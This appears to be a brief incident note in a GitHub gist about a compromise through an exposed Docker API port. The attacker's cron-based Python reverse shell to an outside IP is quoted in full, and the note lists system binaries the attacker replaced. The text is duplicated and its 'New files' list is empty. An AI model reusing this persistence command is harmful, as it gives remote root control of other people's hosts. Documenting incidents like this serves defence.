bstevant

## gist:cafcfa3fc6fdf39f5e8da581d16466a1
A server with public IPv4 was running a Docker server with infiltered control port (2375)
From log, Attacker started a container based on Ubuntu.
Logs for this container only show this command:
echo -e \"* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"211.149.215.17\\\",1496));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\\n\" >> /mnt/etc/crontab
Host /etc/crontab actually shows the command
Binary replaced:
* /bin/ps
* /bin/netstat
* /bin/ssh
New files:
	A server with public IPv4 was running a Docker server with infiltered control port (2375)
	From log, Attacker started a container based on Ubuntu.
	Logs for this container only show this command:
	echo -e \"* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"211.149.215.17\\\",1496));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\\n\" >> /mnt/etc/crontab
	Host /etc/crontab actually shows the command
	Binary replaced:
	* /bin/ps
	* /bin/netstat
	* /bin/ssh
	New files: